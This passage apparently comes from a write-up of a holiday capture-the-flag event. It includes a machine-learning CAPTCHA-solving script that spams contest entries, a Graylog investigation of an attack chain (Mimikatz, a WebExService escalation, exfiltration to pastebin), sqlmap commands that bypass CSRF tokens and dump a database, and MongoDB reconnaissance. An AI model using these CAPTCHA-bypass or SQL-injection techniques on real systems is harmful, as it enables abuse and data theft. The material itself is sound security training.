        challenge_image_types = [challenge_image_type[0].strip(), challenge_image_type[1].strip(), challenge_image_type[2].replace(' and ','').strip()] # cleaning and formatting

        #Going to interate over each of our images.
        print('Processing Images...')
        for i, (k,v) in enumerate(b64_images):
            img_data = base64.b64decode(b64_images[i]["base64"])
            img_uuid = b64_images[i]["uuid"]
            
            # We don't want to process too many images at once. 10 threads max
            while len(threading.enumerate()) > numThreads:
                time.sleep(0.0001)

            #predict_image function is expecting png image bytes so we read image as 'rb' to get a bytes object
            threading.Thread(target=predict_image, args=(q, sess, graph, img_data, img_uuid, labels, input_operation, output_operation)).start()
        
        print('Waiting For Threads to Finish...')
        while q.qsize() < len(b64_images):
            time.sleep(0.001)
        
        #getting a list of all threads returned results
        prediction_results = [q.get() for x in range(q.qsize())]
        
        #do something with our results... Like print them to the screen.
        valid_types = []
        for prediction in prediction_results:
            prediction_img_type = ('{prediction}').format(**prediction)
            prediction_uuid = ('{img_full_path}').format(**prediction)
            if prediction_img_type in challenge_image_types:
                valid_types.append(prediction_uuid)

        ### END Prediction ####
        
        # This should be JUST a csv list image uuids ML predicted to match the challenge_image_type .
        final_answer = ','.join(valid_types)
        
        json_resp = json.loads(s.post("{}api/capteha/submit".format(url), data={'answer':final_answer}).text)
        if not json_resp['request']:
            # If it fails just run again. ML might get one wrong occasionally
            print('FAILED MACHINE LEARNING GUESS')
            print('--------------------\nOur ML Guess:\n--------------------\n{}'.format(final_answer))
            print('--------------------\nServer Response:\n--------------------\n{}'.format(json_resp['data']))
            print("Failed! Threads: "+str(numThreads))
        else:
            print('CAPTEHA Solved!')
            # If we get to here, we are successful and can submit a bunch of entries till we win
            userinfo = {
                'name':'Krampus Hollyfeld',
                'email':yourREALemailAddress,
                'age':180,
                'about':"Cause they're so flippin yummy!",
                'favorites':'thickmints'
            }
            # If we win the once-per minute drawing, it will tell us we were emailed. 
            # Should be no more than 200 times before we win. If more, somethings wrong.
            entry_response = ''
            entry_count = 1
            while yourREALemailAddress not in entry_response and entry_count < 200:
                print('Submitting lots of entries until we win the contest! Entry #{}'.format(entry_count))
                entry_response = s.post("{}api/entry".format(url), data=userinfo).text
                entry_count += 1
                print(entry_response)
            break


if __name__ == "__main__":
    main()

Since this script requires a lot of resources, I will be using a Deep Learning AMI in AWS.

For those that don’t have AWS, you can use Google Colaboratory, which is a free Jupyter notebook environment that requires no setup and runs entirely in the cloud. You can write and execute code, save and share your analyses, and access powerful computing resources, all for free from your browser.

Within the AMI, we active the tensorflow install, download all the files again, and copy over our code. Once we have everything, we will run our training mode against the images provided to us by Krampus.

This should take about 15-20 minutes, so go grab a coffee! β˜•

[ec2-user@ip-172-31-36-164 ~]$ source activate tensorflow_p36
[ec2-user@ip-172-31-36-164 ~]$ cd frido_sleigh/
[ec2-user@ip-172-31-36-164:~/frido_sleigh$ python3 img_rec_tf_ml_demo/retrain.py --image_dir capteha_images/

Once our TensorFlow model is trained, we can run our capteha_api.py script and see if we can complete the challenge.

(tensorflow_p36) [ec2-user@ip-172-31-36-164 frido_sleigh]$ python3 capteha_api.py                                                                                        

Processing Images...                                                                                                                                                     Waiting For Threads to Finish...                                                                                                                                        
FAILED MACHINE LEARNING GUESS                                                                                                                                            
--------------------                                                                                                                                                     
Our ML Guess:                                                                                                                                                            --------------------                                                                                                                                                     eb340938-e584-11e9-97c1-309c23aaf0ac,f65753ba-e584-11e9-97c1-309c23aaf0ac,febce1f4-e584-11e9-97c1-309c23aaf0ac,0afbf9b3-e585-11e9-97c1-309c23aaf0ac,28e82970-e585-11e9-97
c1-309c23aaf0ac,3fa212e1-e585-11e9-97c1-309c23aaf0ac,2a203742-e585-11e9-97c1-309c23aaf0ac,2ea2c11d-e585-11e9-97c1-309c23aaf0ac,6cf0510f-e585-11e9-97c1-309c23aaf0ac,55b08
8d2-e585-11e9-97c1-309c23aaf0ac,70008436-e585-11e9-97c1-309c23aaf0ac,eba9bb03-e585-11e9-97c1-309c23aaf0ac,68da7027-e586-11e9-97c1-309c23aaf0ac,800055c9-e586-11e9-97c1-30
9c23aaf0ac,8c5b9f99-e586-11e9-97c1-309c23aaf0ac,6a75eb24-e586-11e9-97c1-309c23aaf0ac,8322d1e1-e586-11e9-97c1-309c23aaf0ac,05afa05c-e587-11e9-97c1-309c23aaf0ac,be7b70b6-e587-11e9-97c1-309c23aaf0ac,bf68b786-e587-11e9-97c1-309c23aaf0ac,16cca208-e588-11e9-97c1-309c23aaf0ac,127459d6-e588-11e9-97c1-309c23aaf0ac                                --------------------                                                                                                                                                     
Server Response:                                                                                                                                                         
--------------------                                                                                                                                                     
Timed Out!
Failed! Threads: 10
Processing Images...
Waiting For Threads to Finish...
CAPTEHA Solved!
Submitting lots of entries until we win the contest! Entry #1
{"data":"<h2 id=\"result_header\">Thank you for submitting your 1st entry to the Continuous Cookie Contest! We will be selecting one lucky winner every minute! Winners r
eceive an email so keep watching your email's inbox incase you won! You can resubmit new entries by refreshing the page and re-filling out the form. <br><br> Good luck and Happy Holidays!</h2>","request":true}

---snip---

Submitting lots of entries until we win the contest! Entry #102
{"data":"<h2 id=\"result_header\"> Entries for email address [REDACTED] no longer accepted as our systems show your email was already randomly selected as a winner! Go check your email to get your winning code. Please allow up to 3-5 minutes for the email to arrive in your inbox or check your spam filter settings. <br><br> Congratulations and Happy Holidays!</h2>","request":true}

After some time, we see that we won the contest. If you go to your email, you should see the code!

With that, we can navigate to the eight objective in our badge and enter β€œ8la8LiZEwvyZr2WO” to complete the objective.

Upon completing the objective, we can talk to Krampus again to learn more about a nasty plot to destroy the holidays… again….

Also, after talking with Krampus, we now get access to the Steam Tunnels, which let’s us fast travel though the map!

Objective 9

Graylog - CranPi

From Krampus, by using the steam tunnels, we return back to the Dorm area where we will find Pepper Minstix.

Talking to Pepper we learn that a few Elf U computers were hacked, and that Pepper has been tasked with using Graylog to perform indent response.

We are then asked by Pepper to help him fill out the incident response form. He also provides us hints on the Graylog Docs as well as Event IDs and Sysmon.

We are also provided credentials to access the Graylog server.

With that, let’s access the terminal and login. Once logged in we are presented with the following screen.

From that screen, if we mouse over the arrow in the bottom right corner, we see the β€œElfU Graylog Incident Response Report” which contains the questions we need to answer to finish this terminal challenge.

Let’s start with Question #1.

So, for this question, we need to find the full-path and filename of the malicious cookie recipe downloaded by Minty after she clicked a malicious link.

To start, at the main screen, we click on the β€œAll messages” button under the filter streams to access the search functionality.

Now we can search for the weird activity. If you read the Graylog documentation, you’ll know that we can search for user names, and even event id’s that were generated by sysmon.

So let’s look for Minty’s account and for Event ID 1 which dictates process creation. If this was a malicious document, then it should have spawned Command Prompt or PowerShell. Also, make sure you select β€œSearch in all messages” from the drop down so we see everything.

Also, I also learned that you should group all your searches in parentheses as it helps filter the data properly.

We see that we have 96 results. If we look into the first event, we should see something very interesting in the ParentProcessCommandLine variable.

We see that in the downloads folder, Minty executed a cookie recipe executable. So this wasn’t a document but a malicious exe! Oh Minty, looks like someone needs some security training!

Well with that information, we can answer the 1st question! We also get a small hint on how we could have found the malicious document using another search!

With #1 done, let’s move onto question 2!

So from the get go we learn that the malicious executable spawned some sort of command and control server, and we need to figure out what IP and port it connected to.

Should be pretty easy! What we can do is use the same query from before, but this time we will look for all events that originated from the cookie_recipe.exe process, and we will also look for Sysmon Event ID 3 which dictates that a network connection was made.

Upon running the search we should only see one event. Examining the event will give us the information we need.

Knowing this, let’s answer the second question!

Onto question #3!

Alright, this one seems to be straight forward, we just need to see what kind of command was executed from the executable.

We can reuse our old search query, but this time we will remove the event id, and search for any events that have the cookie_recipe.exe file as the ParentProcessImage, because remember commands executed by this will spawn either cmd.exe or powershell.exe.

Once we have our events, make sure we sort by oldest time to find the first command executed. If we do some digging, we will find the third event shows the command executed by the attacker.

Knowing this, let’s answer the third question!

Onto question #4! We are on fire!

Alright, so for this one it seems the attacker escalated privileges, and we need to figure out the service used. Service? Hmm…. this sound lile an exploit to me.

If we keep looking though the commands executed by the attacker, we will see that they downloaded a new binary called cookie_recipe2.exe.

If we look a little further into the events, we will see that the attacker used webexservice to execute the binary.

Doing some Googling, we find that this service seemed to be the WebExec Exploit also known as CVE-2019-1647. This exploit utilized a Windows service called WebExService that can execute arbitrary commands at SYSTEM-level privilege. Due to poor ACLs, any local or domain user can start the process over Window’s remote service interface.

If we look at the cookie_reccpie2.exe for network connections, we can confirm that this was the exploit used to escalate privileges as the user privileges returned for this connection were that of NT AUTHORITY\SYSTEM.

With that, let’s answer the question!

Onto question #5!

Alright, so for the next question we need to figure out what binary the attacker used to dump credentials. I already have a really good guess, but let’s look for it.

Since we know that the cookie_recipe2.exe binary was running as System, let’s use that and search for events that have that binary as it’s ParentProcessImage.

Looking through the events, and around the same time frame the connection was made as System - around 5:41 - we can see the attacker downloaded Mimikatz and saved it as cookie.exe.

4 minutes later, we can see the attacker executing mimikatz.

With that confirmation, let’s answer the question!

Easy! Now onto question #6!

So it seems that the attacker successful dumped passwords from the system and pivoted to another machine with those credentials.

If we look at all our previous events, we see the source of all events is from elfu-res-wks1 which seems to be Minty’s machine. So what we can do is search for all events with that source, and also look for Event ID 4624 which is generated when a logon session is created on the machine.

After digging though the first few events, we will see the following event with a new Account Name.

Okay, it seems Alabaster’s account was compromised. So with that, let’s answer the question!

Perfect! Now onto question #7!

For this question we need to figure out what time in the HH:MM:SS format did the attacker make a RDP connection to another machine.

What we need to do is look for logon types. Event ID 4624 dictates a successful logon, but it also contains the logon type which tells us HOW the user just logged onto a system.

Looking into the Logon Type table, we will see the following.

Right away, we see that Logon Type 10 is for Remote Desktop. So let’s search for all events with that type.

If we take a look into the first event, we will see Alabaster making an RDP connection to elfu-res-wks2 at 06:04:28.

With that information, let’s answer our question!

Oh yah, we’re doing great! Onto question #8!

Okay, so it seems that from elfu-res-wks2 the attacker used Alabaster’s account to navigate a file system for a third host using the RDP connection. We need to figure out what the source host name is, the destination host name, and logon type.

Well if we look back into the Logon Type table, we will see that logon type 3 is a network logon (i.e connection to shared folder). All we need to do is search for Logon Type 3 with source IP of machine we are RDP’d into.

If we look at the first event, we will see a new source name of elfu-res-wks3. Which should help us answer our question!

Awesome, so we got that one! Onto question #9!

We’re nearing the end of this challenge, finally! For this incident question we need to figure out the full path name and filename of the secret research document that was transferred from the third host.

We can simply look for this by searching for all events with the source of elfu-res-wks2 - which was the system the attacker was RDP’d into - and look for any ParentProcessImage that contained Explorer.exe which is what windows uses to house all application windows.

After executing that search, we see only 1 event and can see that the attacker uploaded a file called super_secret_elfu_research.pdf to pastebin!

Awesome, so we have our answer to this question.

Last question!

For this one we simply need the IPv4 address of where the document was exfiltrated to. We know that it was uploaded to pastebin.com so let’s look for that in the DestinationHostName variable.

Upon entering the IP of 104.22.3.84 into our question, we complete the challenge!

Retrieve Scraps of Paper from Server

Upon successfully completing the Graylog terminal, we can talk to Pepper again for more hints that will allow us to complete the next objective.

For this challenge we need to gain access to the data on the Student Portal server and retrieve the paper scraps hosted there.

Pepper also gives us hints on Sqlmap Tamper Scripts and SQL Injection from OWASP, so instantly we know this a SQL challenge.

Upon accessing the Student Portal, we are presented with the following page.

After navigating around the page, we see a β€œCheck Application Status” page that accepts an email. Since we got SQL hints, let’s try entering a valid email with a single quote to see if we get an error.

For this case, I enter test'@test.com and press β€œCHECK STATUS”. Upon sending the request, we get the following response.

Awesome, so it seems we found our SQL injection point! So let’s redo this request, but this time let’s capture it in Burp Suite.

Right away after capturing the request we notice something odd. Take a look at the token parameter in the URL, this seems to be CSRF token!

This can pose some issues for us we attempt to use a tool like sqlmap, since if the token expires, the tool won’t work as all pages will return an error code.

Alright, well let’s see if we can figure out how this CSRF token is generated. If we look into the check.php source code in the browser, we notice an interesting URL.

If we navigate to that URL, we will notice that a new CSRF token is generated for us!

Okay awesome, now that we have a valid URL that generated the CSRF tokens for us, we can use sqlmap along with it’s csrf-token and csrf-url parameters to validate a new token for each request.

Note: You can read more on these option on the sqlmap wiki.

Our command should look like the following:

root@kali:~/HH# sqlmap -u "https://studentportal.elfu.org/application-check.php?elfmail=test%27%40test.com&token=MTAwOTg3ODQwMTI4MTU3NzkzNTAwMjEwMDk4Nzg0MC4xMjg%3D_MTI5MjY0NDM1MzYzODQzMjMxNjEwODg0LjA5Ng%3D%3D" --csrf-token=token --csrf-url="https://studentportal.elfu.org/validator.php" --dbms=mysql --level=3 --risk=3
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.3#stable}
|_ -| . [.]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:38:21 /2020-01-01/

[22:38:22] [INFO] testing connection to the target URL
[22:38:22] [CRITICAL] anti-CSRF token 'token' can't be found at 'https://studentportal.elfu.org/validator.php'

Right away we see that there is an issue with the token parameter as it can’t be found.

After a few trial and error attempts, I opted to use sqlmap’s eval command which can be used to evaluate custom python code before the request is sent.

So, what we can do is write a custom python script that will get the CSRF token from the URL and replace that in the token parameter.

First, let’s test to see if we can read the CSRF token using Python.

root@kali:~/HH# python3
Python 3.6.8 (default, Jan  3 2019, 03:42:36) 
[GCC 8.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import urllib.request
>>> page = urllib.request.urlopen('https://studentportal.elfu.org/validator.php')
>>> print(page.read())
b'MTAwOTg3OTQ3ODQwMTU3NzkzNjY4NTEwMDk4Nzk0Ny44NA==_MTI5MjY0NTczMjM1MjAzMjMxNjE0MzMwLjg4'

Awesome, so we got that working. All that’s left to do is incorporate this code into sqlmap, and execute it! Just note that since the urllib request is in bytes, we decode it in UTF-8.

root@kali:~/HH# sqlmap -u "https://studentportal.elfu.org/application-check.php?elfmail=test%40test.com&token=MTAwOTkxMTQ2MzA0MTU3Nzk4NjY2MTEwMDk5MTE0Ni4zMDQ%3D_MTI5MjY4NjY3MjY5MTIzMjMxNzE2NjgxLjcyOA%3D%3D" --eval="import urllib.request;import urllib.parse;page = urllib.request.urlopen('https://studentportal.elfu.org/validator.php');tk = (page.read()).decode('utf-8');token = tk" --dbms=mysql --level=3 --risk=3
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.3.12#stable}
|_ -| . [,]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:48:03 /2020-01-02/
GET parameter 'token' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] N
[12:48:05] [INFO] testing connection to the target URL
[12:48:05] [INFO] testing if the target URL content is stable
[12:48:05] [INFO] target URL content is stable
[12:48:05] [INFO] testing if GET parameter 'elfmail' is dynamic
[12:48:06] [WARNING] GET parameter 'elfmail' does not appear to be dynamic
[12:48:06] [INFO] heuristic (basic) test shows that GET parameter 'elfmail' might be injectable (possible DBMS: 'MySQL')
[12:48:07] [INFO] heuristic (XSS) test shows that GET parameter 'elfmail' might be vulnerable to cross-site scripting (XSS) attacks
[12:48:07] [INFO] testing for SQL injection on GET parameter 'elfmail'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) value? [Y/n] n
---snip---
GET parameter 'elfmail' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 312 HTTP(s) requests:
---
Parameter: elfmail (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: [email protected]' OR NOT 4006=4006-- LbnX&token=MTAwOTkxMTQ2MzA0MTU3Nzk4NjY2MTEwMDk5MTE0Ni4zMDQ=_MTI5MjY4NjY3MjY5MTIzMjMxNzE2NjgxLjcyOA==

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: [email protected]' OR (SELECT 3470 FROM(SELECT COUNT(*),CONCAT(0x716a767071,(SELECT (ELT(3470=3470,1))),0x7170767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- KGEd&token=MTAwOTkxMTQ2MzA0MTU3Nzk4NjY2MTEwMDk5MTE0Ni4zMDQ=_MTI5MjY4NjY3MjY5MTIzMjMxNzE2NjgxLjcyOA==

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: [email protected]' AND (SELECT 9908 FROM (SELECT(SLEEP(5)))ePeY)-- LstD&token=MTAwOTkxMTQ2MzA0MTU3Nzk4NjY2MTEwMDk5MTE0Ni4zMDQ=_MTI5MjY4NjY3MjY5MTIzMjMxNzE2NjgxLjcyOA==
---
[12:52:56] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[12:52:56] [INFO] fetched data logged to text files under '/root/.sqlmap/output/studentportal.elfu.org'

[*] ending @ 12:52:56 /2020-01-02/

After some time, we see that the email field is indeed vulnerable and we can exploit it! Now we need to access the data on the server or in this case the β€œpaper scraps” that are hosted there.

Let’s see all the data stored in the SQL database by using the --dump-all command.

root@kali:~/HH# sqlmap -u "https://studentportal.elfu.org/application-check.php?elfmail=test%40test.com&token=MTAwOTkxMTQ2MzA0MTU3Nzk4NjY2MTEwMDk5MTE0Ni4zMDQ%3D_MTI5MjY4NjY3MjY5MTIzMjMxNzE2NjgxLjcyOA%3D%3D" --eval="import urllib.request;import urllib.parse;page = urllib.request.urlopen('https://studentportal.elfu.org/validator.php');tk = (page.read()).decode('utf-8');token = tk" --dbms=mysql --level=3 --risk=3 --dump-all
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.3.12#stable}
|_ -| . [']     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:59:04 /2020-01-02/

GET parameter 'token' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] N
[12:59:06] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: elfmail (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: [email protected]' OR NOT 4006=4006-- LbnX&token=MTAwOTkxMTQ2MzA0MTU3Nzk4NjY2MTEwMDk5MTE0Ni4zMDQ=_MTI5MjY4NjY3MjY5MTIzMjMxNzE2NjgxLjcyOA==

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: [email protected]' OR (SELECT 3470 FROM(SELECT COUNT(*),CONCAT(0x716a767071,(SELECT (ELT(3470=3470,1))),0x7170767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- KGEd&token=MTAwOTkxMTQ2MzA0MTU3Nzk4NjY2MTEwMDk5MTE0Ni4zMDQ=_MTI5MjY4NjY3MjY5MTIzMjMxNzE2NjgxLjcyOA==

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: [email protected]' AND (SELECT 9908 FROM (SELECT(SLEEP(5)))ePeY)-- LstD&token=MTAwOTkxMTQ2MzA0MTU3Nzk4NjY2MTEwMDk5MTE0Ni4zMDQ=_MTI5MjY4NjY3MjY5MTIzMjMxNzE2NjgxLjcyOA==
---
[12:59:06] [INFO] testing MySQL
[12:59:06] [INFO] confirming MySQL
[12:59:07] [WARNING] reflective value(s) found and filtering out
[12:59:07] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[12:59:07] [INFO] sqlmap will dump entries of all tables from all databases now

Database: elfu
Table: students
[9 entries]
+----+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------------+----------------------------+----------------+
| id | bio                                                                                                                                                                                                                                                                                                          | name               | degree                     | student_number |
+----+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------------+----------------------------+----------------+
| 1  | My goal is to be a happy elf!                                                                                                                                                                                                                                                                                | Elfie              | Raindeer Husbandry         | 392363902026   |
| 2  | I'm just a elf. Yes, I'm only a elf. And I'm sitting here on Santa's sleigh, it's a long, long journey To the christmas tree. It's a long, long wait while I'm tinkering in the factory. But I know I'll be making kids smile on the holiday... At least I hope and pray that I will But today. I'm still ju | Elferson           | Dreamineering              | 39210852026    |
| 3  | Have you seen my list??? It is pretty high tech!                                                                                                                                                                                                                                                             | Alabaster Snowball | Geospatial Intelligence    | 392363902026   |
| 4  | I am an engineer and the inventor of Santa's magic toy-making machine.                                                                                                                                                                                                                                       | Bushy Evergreen    | Composites and Engineering | 392363902026   |
| 5  | My goal is to be a happy elf!                                                                                                                                                                                                                                                                                | Wunorse Openslae   | Toy Design                 | 39236372526    |
| 6  | My goal is to be a happy elf!                                                                                                                                                                                                                                                                                | Bushy Evergreen    | Present Wrapping           | 392363128026   |
| 7  | Check out my makeshift armour made of kitchen pots and pans!!!                                                                                                                                                                                                                                               | Pepper Minstix     | Reindeer Husbandry         | 392363902026   |
| 8  | My goal is to be a happy elf!                                                                                                                                                                                                                                                                                | Sugarplum Mary     | Present Wrapping           | 5682168522137  |
| 9  | Santa and I are besties for life!!!                                                                                                                                                                                                                                                                          | Shinny Upatree     | Holiday Cheer              | 228755779218   |
+----+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------------+----------------------------+----------------+

Database: elfu
Table: krampus
[6 entries]
+----+-----------------------+
| id | path                  |
+----+-----------------------+
| 1  | /krampus/0f5f510e.png |
| 2  | /krampus/1cc7e121.png |
| 3  | /krampus/439f15e6.png |
| 4  | /krampus/667d6896.png |
| 5  | /krampus/adb798ca.png |
| 6  | /krampus/ba417715.png |
+----+-----------------------+

Right away we see a table called krampus which stores specific images with a corresponding URL. If we browse to one of the images, we notice that it’s a paper scrap!

So, let’s grab all the images and download them. Upon doing so we can use photoshop to combine the images and we are presented with the following image.

After reading the letter we learn that Santa’s cutting-edge sleigh guidance system is called Super Sled-o-matic.

Once we know this, we can then navigate to the ninth objective in our badge and enter Super Sled-o-matic to complete the objective!

Objective 10

Mongo Pilfer - CranPi

From Pepper in the Dorm area, we return back to Hermey Hall and enter the NetWars room where we will find Holly Evergreen!

Upon talking with Holly, we learn that her teacher has been locked out of the quiz database, and we need to gain access to the database so quizzes can be graded.

We also learn from Holly that we will need to know a little bit about Mongo, so she provides us with a hint for the MongoDB Documentation.

After reading through the documentation and familiarizing yourself with it, we can access the terminal and are presented with the following:

'...',...'::'''''''''cdc,',,,,,,,cxo;,,,,,,,,:dl;,;;:;;;;;l:;;;cx:;;:::::lKXkc::
oc;''.',coddol;''';ldxxxxoc,,,:oxkkOkdc;,;:oxOOOkdc;;;:lxO0Oxl;;;;:lxOko::::::cd
ddddocodddddddxxoxxxxxkkkkkkxkkkkOOOOOOOxkOOOOOOO00Oxk000000000xdk00000K0kllxOKK
coddddxxxo::ldxxxxxxdl:cokkkkkOkxl:lxOOOOOOOkdlok0000000Oxok00000000OkO0KKKKKKKK
'',:ldl:,'''',;ldoc;,,,,,,:oxdc;,,,;;;cdOxo:;;;;;:ok0kdc;;;;:ok00kdc:::lx0KK0xoc
oc,''''';cddl:,,,,,;cdkxl:,,,,,;lxOxo:;;;;;:ldOxl:;;:;;:ldkoc;;::;;:oxo:::ll::co
xxxdl:ldxxxxkkxocldkkkkkkkkocoxOOOOOOOkdcoxO000000kocok000000kdccdk00000ko:cdk00
oxxxxxxxxkddxkkkkkkkkkdxkkkkOOOOOOxOOOOO00OO0Ok0000000000OO0000000000O0000000000
',:oxkxoc;,,,:oxkkxo:,,,;ldkOOkdc;;;cok000Odl:;:lxO000kdc::cdO0000xoc:lxO0000koc
l;'',;,,,;lo:,,,;;,,;col:;;;c:;;;col:;;:lc;;:loc:;:co::;:oo:;;col:;:lo:::ldl:::l
kkxo:,:lxkOOOkdc;;ldOOOOOkdc;:lxO0000ko:;:oxO000Oxl::cdk0000koc::ox0KK0ko::cok0K
kkkkOkOOOOOkOOOOOOOOOOOOOOOOOO0000000000O0000000000000000000000O000KKKKKK0OKKKKK
,:lxOOOOxl:,:okOOOOkdl;:lxO0000Oxl:cdk00000Odlcok000000koclxO00000OdllxOKKKK0kol
l;,,;lc;,,;c;,,;lo:;;;cc;;;cdoc;;;l:;;:oxoc::cc:::lxxl:::l:::cdxo:::lc::ldxoc:cl
KKOd:,;cdOXXXOdc;;:okKXXKko:;;cdOXNNKxl:::lkKNNXOo:::cdONNN0xc:::oOXNN0xc::cx0NW
XXXXX0KXXXXXXXXXK0XXXXXXNNNX0KNNNNNNNNNX0XNNNNNNNNN0KNNNNNNNNNK0NNNNNNNWNKKWWWWW
:lxKXXXXXOdcokKXXXXNKkolxKNNNNNN0xldOXNNNNNXOookXNNNNWN0xokKNNNNNNKxoxKWWNWWXOod
:;,,cdxl;,;:;;;cxOdc;;::;;:dOOo:;:c:::lk0xl::cc::lx0ko:::c::cd0Odc::c::cx0ko::lc
OOxl:,,;cdk0Oxo:;;;:ok00Odl:;;:lxO00koc:::ldO00kdl:::cok0KOxl:::cok0KOxl:::lx0KK
00000kxO00000000OxO000000000kk000000000Ok0KK00KKKK0kOKKKKKKKK0kOKKKKKKKK0k0KKKKK
:cok00000OxllxO000000koldO000000Odlok0KKKKKOxoox0KKKKK0koox0KKKKK0xoox0KKKKKkdld
;:,,:oxoc;;;;;;cokdl:;;:;;coxxoc::c:::lxkdc::c:::ldkdl::cc::ldkdl::lc::lxxoc:loc
OOkdc;;;:oxOOkoc;;;:lxO0Odl:;::lxO00koc:::lxO00kdl:::lxO00Odl::cox0KKOdl:cox0KK0
OOOOOOxk00000000Oxk000000000kk000000000Ok0KK0000KK0k0KKKKKKKK0OKKKKKKKKK00KKK0KK
c:ldOOOO0Oxoldk000000koldk000000kdlox0000K0OdloxOKK0K0kdlox0KKKK0xocok0KKK0xocld
;l:;;cooc;;;c:;:lddl:;:c:::ldxl:::lc::cdxo::coc::cddl::col::cddl:codlccldlccoxdc
000Odl;;:ok000koc;;cok0K0kdl::cdk0KKOxo::ldOKKK0xoccox0KKK0kocldOKKKK0xooxOKKKKK
0000000O0000000000O0KKK0KKKK00KKKK0KKKKK0KKKK0KKKKKKKKKK0KKKKKKKKKO0KKKKKKKKOkKK
c::ldO000Oxl:cok0KKKOxl:cdk0KKKOdl:cok0KK0kdl:cok0KK0xoccldk0K0kocccldOK0kocccco
;;;;;;cxl;;;;::::okc::::::::dxc::::::::odc::::::::ol:ccllcccclcccodocccccccdkklc

Hello dear player!  Won't you please come help me get my wish!
I'm searching teacher's database, but all I find are fish!
Do all his boating trips effect some database dilution?
It should not be this hard for me to find the quiz solution!

Find the solution hidden in the MongoDB on this system.

elf@aa816f0ac957:~$

Alright, so we need to find the teachers database and find the quiz solutions! Seems easy enough. Let’s start by opening a command line to interact with the database by using the mongo command.

elf@aa816f0ac957:~$ mongo
MongoDB shell version v3.6.3
connecting to: mongodb://127.0.0.1:27017
2020-01-22T00:49:57.905+0000 W NETWORK  [thread1] Failed to connect to 127.0.0.1:27017, in(checking socket for error after poll), reason: Connection refused
2020-01-22T00:49:57.905+0000 E QUERY    [thread1] Error: couldn't connect to server 127.0.0.1:27017, connection attempt failed :
connect@src/mongo/shell/mongo.js:251:13
@(connect):1:6
exception: connect failed


Hmm... what if Mongo isn't running on the default port?

Hmm… interesting. Right away we see that we aren’t able to connect to mongo’s default port of 27017. Well, we can easily check what port mongo is running on by executing the ps command to list all running processes on the system, along with more information such as the user running the process, command line arguments ran by the process, etc.

elf@aa816f0ac957:~$ ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
elf          1  0.0  0.0  18508  3360 pts/0    Ss   00:45   0:00 /bin/bash
mongo        9  0.5  0.1 1018684 63392 ?       Sl   00:45   0:02 /usr/bin/mongod --quiet --fork --
elf         52  0.0  0.0  34400  2948 pts/0    R+   00:51   0:00 ps aux

Well it seems that we got a command line argument, and we see something about our mongo process, but unfortunately the text for the command is cut off!

Not to fear though! Using some linux foo and the awk command we can cut out just the commands, like so.

elf@aa816f0ac957:~$ ps aux | awk -v p='COMMAND' 'NR==1 {n=index($0, p); next} {print substr($0, n)}'
/bin/bash
/usr/bin/mongod --quiet --fork --port 12121 --bind_ip 127.0.0.1 --logpath=/tmp/mongo.log
/bin/bash
ps aux
awk -v p=COMMAND NR==1 {n=index($0, p); next} {print substr($0, n)}

Nice, so we now see that the mongod process is running on port 12121. With this information, we can try connecting to the database again and specify the specific port we want to connect to by using the --port parameter.

elf@aa816f0ac957:~$ mongo --port 12121
MongoDB shell version v3.6.3
connecting to: mongodb://127.0.0.1:12121/
MongoDB server version: 3.6.3
Welcome to the MongoDB shell.
For interactive help, type "help".
For more comprehensive documentation, see
        http://docs.mongodb.org/
Questions? Try the support group
        http://groups.google.com/group/mongodb-user
Server has startup warnings: 
2020-01-22T00:45:29.764+0000 I CONTROL  [initandlisten] 
2020-01-22T00:45:29.764+0000 I CONTROL  [initandlisten] ** WARNING: Access control is not enabled for the database.
2020-01-22T00:45:29.764+0000 I CONTROL  [initandlisten] **          Read and write access to data and configuration is unrestricted.
2020-01-22T00:45:29.764+0000 I CONTROL  [initandlisten] 
